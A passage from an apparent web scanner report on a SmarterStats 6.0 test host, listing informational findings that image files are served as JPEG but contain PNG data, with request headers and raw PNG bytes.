Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.47. http://vulnerable.smarterstats.6.0.host:9999/Temp/b970dd6404e94f54894db427147a64da.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b970dd6404e94f54894db427147a64da.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b970dd6404e94f54894db427147a64da.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:25 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 10437
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..(ZIDATx^.]...U.._Q.....dp.    .....""..........F"..3.B.$!..@.!$.y8.&.....%V.Q.*.........O.s.....t.>'..v......k.......{.\"...H...xO../..    ..D.J.H.@$ ..........@$ .."...    .....!..w...    ....D.D."..K@...] .D.".!"....H....".{.....H
"j.....v..8Y.+''FK...].\$ ..O..'......Pm.9.&FGU....P.#c.U.c..../.D."..@..(.-56.MD.z......K...D.qJ .".C...Y.p.....2.{......6n...-[....~[..@t.....?.a1_4D.F..Yw...p..WI.d4...t..A.Y.v.......!(M.N.2..U.."..@.O.c....}....D.'..GT.!.S&X..#......#rSn..c5.N[.;GJfu.ND.......@8z.,..J..}L....)...b.>.h..X....U....D:eo.p.;..L...n...i.`.H..N.DD...|...i..BD|Y..)..K.f..U......]j...H...X.......Y.!"........-..C....U.BDBD.....X..4....Y.!"!"3..T[... .........U.O.X..:....Y.!"!"3..T[../......5c......7%7yP...iC/..krR..........X.....d*..    ...............;...K/U...^...OW.~.M...:..n
T.H..Tg.... 8....ms........~{..'o...O..YJ}z..#...{e.!Z.+..>.y..%......Z|.Ej......^a7.*..xD.:..~...i\/.#@._4$.t.M    ....W.X.....6.....l....X...^`?.aCBD...G.......}-....^`...XG.H..Fo.... 8...M..z..3..B.u..    ......;G.BD%R.........ApZ...O~.[...}.%..O~....+Wr V...v.....Gd.7...j......_..@...........".L.....6.....l....X......~..........m.........\...m.E@D.s..2.....#c...rT.d..U~..B.3VS..v...,..?.<.!.....-...Q....0..L..2.VHIbD..c_...iQh.....":....7~..Ny.....+..@........N......y.i..*lBDn.fswhc....'4v..:KB..*Z........-..{D9...J...Nhf.6..1M.(Dd.&.... 8-.}..?T...A..lYw.U...r..n.-."..(+4.).3.../Bjj."....G..."2.A..|.....|...6.*k.........J9]GBe..b.h....7.q._f..=4.9....i..._.*W..rKBD.f.^......G. ..l....3.J..VO....Ap.......VB6.iK..DD....;......
......;....G:.f.L...`.3..    K...*dwo...iMH.z.~.w..^....i.w...:$v.........K.....U....*n.+$vl..............:$..>..=b".L....U....*..D...Y..:..._......3.VW.*....I....C3..>)V.....=..?.\../~QZ..>[=u.]...uBb...C.....{..|I...X...........tN.q".....4......-&.'..    A..E..... 8.    ......z.VP....K..O}J......-&!.TrBD.*dwo...iMH..F?w.5.D........^!..b."."r...{c5.N.Ba..To........L.....<Ba.......dh..CV..j......c`A2{...*".x.uI.,|..Ba....G.H..U..... 8.    .].!:t...8..RV..xcBD.s...jW.P...dn."."r.!..c5.NcBa..T......[......#7..5HI...jd~...iI(.8.v...:F..W.)........l.P.m.... 5!"W52.?V...$.v.......%..i1..~.P.9r..H<"W=.~...ih(.H1...>.......e.Y(...    .    ......c5.NCCaGJ.q:....f.v.B.F.+.v.,24.....8...Ap....>.....?F;..._>.!.,m...B`..Q.Gf.H".#..Jf... 8.....B...l$..9..
..#..:BDBDM:...X.....q.b...Y.c....,:.|...!.sd.TG.H..IG....Ap........":v...e......92k.....2..ft.._&...5....c5.NKC`G............6.Y....5..;..2.....q..`M.^!!.&5..{...ii..8...ct.uS..cBl7.....YS...Q.`.d2?...._%.!.&5..{...ii..8.l)-f|..?h,.........n.N... Jn...*2..&R../D.Ce.<#V.....v.v...3r.h..W......^!..b(......7.AD..U...(c) .u...5.y.T.Q.u.?.eK4...8T.^ehV.........T.h.o.z1....V.}...e.%_...."..7v..W...G...j..5.L$jL......7.... 8..]/f..p...m......;G^.:}'"n.W../..X..I...w..H/f<p.m...}.....hj..&1w.....NDu..L..z..b5!.T.!....by...m$!MT.;.c.{.D$.^..9.Qp...N...i.o........YC.2...W...........|...9...Ax...j............$.zs.:.j..o..yq.D..q...#D.G.&O.. 8m..=Y.x...(....e.z.7v..8u..HJBD.UQj..7.....ZC.U.+V....7v,f\E...$.z...lRO...........GO....N......6....b5..0|c.<..K...w..<(.-kz..n.~...HL<.fuZD.....L.......&...b5.fI......H.6L...K.Q..L.X....xD...d~.j?...(...7]..s...{.*.j........J2.l.e..10.|b7}w]}!"!.F}..v....6.xG6_d..X.Q...9..u..'rI.....6G..*w!"!.F....bCG...S6..M...:.xY.X.........&(+[....Mw...........Q...9.....'}..H.):..vu...fD.5D.(+GV..?..I$D....SA...}...]~.z......g.i5.,D4#odw]...w..(...o..W.v..G.1/    .Uw..aL...Wo.=WV............Ap...;.......l.....'D.:.Idr..n.....C.dW...:Io....k5.:.........?...........*.G4#o....Q.......(.!%..Y?.s.....deuM_`....s....b9H.h.q.X............|...e..M...v.wr.:zD .1..'....2...o........i..
.QY..G>b.'.. 8....>.m...V..J....G..v..L.8.Qv8.....S#t....L...nH.._......
..UVl.D!q.K.w./.....29@..*...}..g...............D.xG.U.#*.".Ba({(0Ze.[h........GY}a.k.lH..`....&./.&...u$...Y.eU.@.}.!.r.....(..
..-+......"p...1'.Eih[%...#vg....v..L.X...f$..U.t&..........x......e].l!.r.#.(..5..M.(V..../.8Re).!j.o.. .Gi=......;9u-.H?.........3.....T...."*..b.v%.r.-.e9e(EP.... 8m..}.....0.. ...!w..~..s.dR...L^UUW{Bu.F..xX........K.k\8..1..n..,V..h...H....s............X..&..!Z.0.b..Y
..{..)3..,....R.......8).%.k}....V...:..........k..6wn..GA"1.di..v.9DM...}-...3bhO.......H.G.,    .!6..@@....#.|..ut.-...P....&38>.
~k....]o....,....3.Q .......w.....L^..k.o..|41U....}...=....i....i.T..........GB>....&....wZ....d.........$"..Y.....&.df..B.1..Gd....................a.....Apt..vS....K.Q X...|`.....%..^...x....HD...M.g.m....&......e.....:!N........Ap...;...Erd[Ug..W./&...##.:..Q7tI9......3f.t.2.P.)..a....P..%.^....\p.ZI.^\...k.G. ...|`....^.D$).9..B..ah.1c......t?...\!ps....+...=....-........Z...,W....V....[.P]bDy....=.+..P0....s.j.....V ....K....5.......H......g...t.2)..P.;...A...:D.5D.2....    .^..b..%...5...=!..L....cv.rm..].....E.....W. z...l..b8<...,...].SG.(.W....1.1..O;.e....O.r..3..:.,+....a...S4..+v.{L.    ....Kg..3.>p.f.L.B...Y...Ap...;..X......./ o..@\.s.cSG.H.(.7z...Z.kJB...2R`....1V....+.d......[..x.&;.].s.cSG.H.(.7:....g.i..i...l.s..X.cD...z    D.....|..<F3.BD.^..:.#..$}*.4-..1...=jM39...U....QKh.."Z.dr...Z.`.x.t...|..h.......w....H<...$.T:..0-..-..>.q=....w. .R....:d.O....../.....].O.V.....`5xX.$...C.U.H.(._..(2n.#...o...a.z.....}W_.xbXz..r..U.IbD:^.E........[.....r."."....|]MG.......I3{..'.a..-J....../L.2.......f%...l...p.eFmv..D.R.BD...<f..+.j(s).V.w.j.....8..N.^.i./S.r...<L....W..5=...;w........J...D..5n).`..T,...FC.C4Ds)+h6..UU....>.p'....|.....S.....C_`t.m....Q ...24s....c..d
40.....E.Ez.....r5.-4+.aR..D.....^W.'.9...&Bw...}i..*_}.d..........L..G.zD......]..b...s9D.T..2.Y.v.W..p<F...q...Z....b..<K.]....d..-..z,D.!"."....ba..#......(........0...t)...3[....-.`.%c<....nK..-..v....gz5=...~.@14.,....6...Xz....E...C..lL..).......;..*.Z.^............'..9..rw..b.!..gDBD.^..f:..#.kU.
I..0.a..7t.p..K.r_kOF..Ie_k..x...*c...Ty....>..'    .Y.h!'w..-..r.>3."j..j...&.........+TCw.....K/.;@.0....T..*.......`..u.....k]=[..[%.vO...A[1..\..9.v....i....L2..dz....?.cG..3.H!..Z..#9Hkq|.g........['O....).y...c>F..@.>..g=F.....}...3.*..iFW..e..C....qLa....../...Z.m$.4...
f/[.z....OuXu....om..3|....-.U..#x..l.s..Rg =....6C.....q.^.Ur.0_...s.......9......b... .Z..DpM8.h)B...v=..B.OS.q..B..`...U..."2....Vc.7......G...G0h..}(....N.y....d.6.c...gw......98.....l...?6....v.:...........5=#b"...BO... -.V.....b.h.9..2.Qv.9...mqw..../........E.n.]o..A..-..5.$Bx.\9......a.2..4).VJx.dW....6F..4...t..*.....*.R.9{........{.....`..)).........TL....r.no3.N.. .0.}.c.R.j...l."..kr@..hq d.... -.G...mpca$.n!...s    .RU....
...3.N.n.z{..........L...#2i.K]..t./....5....u..b!n.rx..M.....jkc...Ts1<......./.[.|.B...M.....of#wo..y...    '!".L.|..3.....w.*.<.....S........4...3..I.G.    3..'.O.<...;.p    ...3w...&.....Q...O.6r....    ...Q,..0..a.V
..2..s..3....\F.....O..}N..`..m-...b....s...`w.O..BD..h#.4..t..b!..SL..(.. ..1.|A7.a...*[.....LpC..@5...3...l.)v=u.<M..b.._@k.8..L....K]!.......s:.E....(...H..D@0.et..>..p..g==<....HOo..gHD{.C.|.L.wN...?L.s.#(?..v..R"z..x..C.=...x...3
,Cx..".|4..&c.....^Ig.!@~..    #..D0.D<..3.g.C..2%".d...i/t..d..S.M.....Q    ..O.6.......<zT!..C..+..I=...<....{.o...].%ZY.\/..k.....K.#O...3....=.m..{.*..3v...l.s.[.N.45..{..|..D..._...N.6.n..~.......a.V(.....G..ho.....HE.._G(.K..X.)...#.h.y.&....)Pm....0C8..~...bj..8,..{[....).F..DM.....Q    ......W.{.~.i5+...    JG.Y_.<3x;YO.!Z...\O_.-.t.(k,u......=:u........"...L...}.$.i.."XNN7S..t..9BD.....r.,...7N.....k.....^    ..3.Z.A0>...........M..,.A..$.MV..`.v....u9y.u.E........u?N[h\.......]&.9..UG.H..."..)..YC.h.T0..B.&}.j
.....7~.=..YJ.!.........?A.....~..F].7....V..}..yU..&@&...Oz..1.....;.4...    .&9..]....t.6.....K....L..wM.<+.B0.[I...bU!............F}F.e>.......$......1ko...........{c.x. D....L. NT......c    bB%..o..AA...iB...@...y..w.....iv.CdxP>.>I$.2..o..L.Y/;....Y...&.=.L....j..$Rw..&....j.ca.3*.
`.{.`.0.)..9.H.m.K....e..)j...l.%....2ZJ.0 {LLpg.L.9IZI.....=....4."C.F....6.. .(....N..3..@2e.f..........1..B.c..3..3....._....)xZDZ.......'g&.....m1y...g...>..4."..g.Q%DDdQ,.4.X...c........Y..0.~L..t.Bl._..DN..8...:.D0.H& .2..Cc..../R0..3.<..w.]........<......t..k.........$...j_l....Zc#jdd.....4=B........#(....S...=J.`..g.rAqz.....$........E...P/....xGU.0.....u.q....c.....8.....C..{.......2.]..3..[!........A....7Tq_.....r^Q....]7S|..r........*...D..o#....I..a..]..O.$..f.f..ce*k..n]Ym@......P.D...`.....ubY...X..zu...{..%/....B....a\.m......&.h.. 3...z0=........z...Pg..G...n.Ll.....%.*.k0.(.|2C...L./...:._G=<..v(.F...J.N...`..3...@..0|.#.........tbz.e........4...'>. ....
2.C..6.r..`.Qk..Cc*.)................|.*..t[..]............e...z"..xbC5.......fYBZz.
....U.l.].....a..S.+AB.1.R...4.0.zu.t...r...iW.1Q.....FY......EC....%.r#6.....}.........~.)0.d.......f,,...@xD....&.H..h.#2..[......,O...k]WO~.....g#..........s.............J[F.."j;A..Q..<N.3.e.m>......"9=.).....-x%...g.....2.lJp[B...S.\.V.g.10D.*....'.O.;)".S.X..>...b
..U...G...j.......(&s.%..k...\BD$%!"! [..C.;....Sve..4..(..m....V.k.L.F....BxU ........p.!"MD.B.."2.......:....A>G...E.&i....V.s6..[.D-.YA...w
..8.V......Jr.!"!..1...ze:..!...b!&.;f.El.P....A!..O}.....".......K.H...F...A.V......44.D}ZN.I.G.G_.aVM/2]Lq.M..r.w..[q.!"!".Bq.N.\.v...v.O.....NR...x..bJd.M....J..&...84..I....RD.....I
0. ..o.|....@.N.......z.%.G.zDS$|)"....:p....\BDBDB...
..BD........G..@t......:.%.G.="Q@.
(...6............`......_.8t..,K..(%.I"")"....:pP..E...h..GH.........\.2D...G$D$D,:.]...X<<.#.......D.......fY.xD.#.".".....BD,..xDt(.......W.8...*.l.?a.^HH.Xt.....DT....K....X.)"....:0}.U...P.....UID.....1.<....!....<h.DD.z....D......W.GTGD.L.K..U...."2.....k..."...JM]..f.z*.A...&.....P..*3.V.n..m~....*.A.......|8...d2}._..D..H.D.CKD&B.."..@% D._...E.".......H@$.w    .......H@$0dDtRM...V._..#j.....f.9v.}K....\.d.H.}X I..y.7Mj....G.x./..d. .vd.^.'..h]j.7..>.IV...3#eJ.1v..!""(tF9`.....1Ig..&..D..ccj,.D.gt..........B.....ctx..[....m.A...t...o..y=..W..$..9\..o....=..!!".E.Qd=..w........i.N........r.<...Q..Y.+w.b.[.w.^.X..c.n.8q........I...|.b.>|D.[TCDe..o.o)...H....f...p...Q...".X.v.)/....U{."k...T..j="...JO._...Tx...Q...m......r..t..9R.vZ..3.
.e.. D...f<:...(...HD..C..J...gIH.Gz...Q.A.LI.M{si.t&...o...)..5..L..$H.!.6.e.-.GT..ROB.db.[..............^s.....s=...?..Q.~..)..5.P[......Y..n7....-.G.7.v...-&.3.Y....^.....er..|...\..z..^1d]..*#.^c?U<..T.H..YUL).......A. ".K.s.5....K........z.'nR..Y).%..........f...Wi.2b...C.#...._D."..% D..    B...K@.h..X.(.._.BD... .    .........."..% D..    B...K@.h..X.(.._.BD... .    .........."..% D..    B...K@.h..X.(.._.BD... .    .........."..%..}4..........IEND.B`.

10.48. http://vulnerable.smarterstats.6.0.host:9999/Temp/b994a8c169af455497c7747bd9914800.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b994a8c169af455497c7747bd9914800.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b994a8c169af455497c7747bd9914800.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 19860
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..M)IDATx^..wx......s..s...;g..7..18.>.L."G..1...&..E..Y.@.....$rFd..B".!.I...........`.u.*.........U]o=.z.t..{W....Z.-... .. .. .. .i.oi.uh.............A.a.............    @.i|..<...........`................`....y .. .. .. ...9.. .. .. ...'.....B.@..@..@..@..s..@..@..@..4N..M.............................h....................6.............8..6...... .. .. ...l.. .. .. .. .q..l.. 4..@..@..@.. .0.@..@@%.....X,.Yq*uj:.:.,..c    %...e.gI........Mm?#,K...y.*.)7....@... ....lZ.    ...@@.......g,..8.4$...z..J..........,...$........:....t...m..`..8.. ...@..S..sO2.YL].0.WL.8..%.W..K.0!.L.1..+..T..=$.&{.m.F.y.....C..L...........L.....U...!.R.V.(......c.E....y..[Y.....7........*.........6.p.S@..4H.......=.n....jek...O.`.'L&..    6Y(............6.24    ..!....G...@@g.^.......~.M!O.....x........V.
M5.F..P ...0... ....l...g...h....~...6{.]B.    o.<.Z.Y....e..L".....Z.......'_.......-A@.. ..1.h.....    ../&y(S...&.X./.B....b..{.....Y..l.#....#.....As@..|C`.......W.fYz...R5;...    .2!X.....y....W..7..-..`..(. ..>'.w....q.....A..@....l.P.5 ...'0c.YJ8rU..@.@...A......^...X..p(.Eq.......@..a..F....    p..'.......=..`..(.. .......\.............F    m...P...p...@...B..M/#.v....F....D5FnP.~......x.....    .. ...#p....6b..........=..l.. ...#.q..}...............~..-...p....<
[w...q.............. ..~&..|..p.....^.@..e..N......K...'o.v?...@...M.....q.......k............^F
........v'0...SxS..Gr.I.6
.J....Q.......6....
..!p..D...EX....x...B.........Vwb2......M.'][....4x.t..SvS....gq2..:.....@...D..MK......    .8.;p....K..m.DT..;.^.~I.5.....W....^.../Q......LI..].!..B..f!.=G81.e.....6......N...SJ8rU...?(.T.M=J.br(x.5..2w.^...f!."......<qh..O..}..?.....`..`.) ...x..gd.[.N..]O.Fn...G$.YH.m..4%...q.....V..b.E'..-.g.....".....@k@ `.pB..4..5.r..D...+.u%...8...7.o.......@... ..j..`S.(....&....i..,...F....i.Zt&|....s.H..X..xC......:.x........ `$..Q..J......4#.:...B....,PY..`.$
f..........C...;\qW..x..n+v.E.>b..].....S.f.8...T......!.@......w.@..C....    .P...M..Pk8.._..uZ~...d).OV..MPrrE.Y......P&../....n..`s........b..%.,j.5.q....,.X...L.f.....D..u,..;.c.{5....O;@......9..O..'*p...n\.......(!..........`......7J^"o$..8k...$....Y..T.....v.G....c..%N.$dbg..._.:.(%............./.>.!../...3.S.Qk...fZ..#VS..].6.........I.II.s......... .....BP8..D.Cu....qP..'........o.B...G....]G.#EHXE..^K.3....X$......k..l.. ..f......4T.V.g...$.U.AK............t.....f....c.z.. ..r..l.. .......=<Mf..8..i.UiA..+...E.0...8U.,.oF_s4.mx5A..~'.......'.^.>..J.cz.u./...a...kF&H......R .....D.A@F......L...5...ZD...3.f^&...J
{.J.....ZL.k.Wz.*.m.~A.u..`..........n#...N.O*.!2'9....`.......O..Q.....=...
......<l..w........t)..nM5...?<."......Z.>.Q..=...wa.+.....q    @..w..s....(..7.{.-.Z.%.....5....=.m.N...=.mc.P.q......_t... ..=.........z.;..|WC..W.....R.!q0.....@,.]..>.C.....CW.4..U.06..6c.?zo.....S.I.n..eo.'.."z...x..w3J.OO.2|... /2.ih..l..~t....&.P...\..t..&.J.k.`.e..x./.vy......>.J.h3...>..........t..VeR.Yi...S.g.a+    .;.R6..?..&m.......{................T..".PY...\..7.U..P......2....Vb..A...;.~.............Cd...e..h.&i.....x...5.UO.'.4.......N.; .. .0.@ ...Xc/...\....
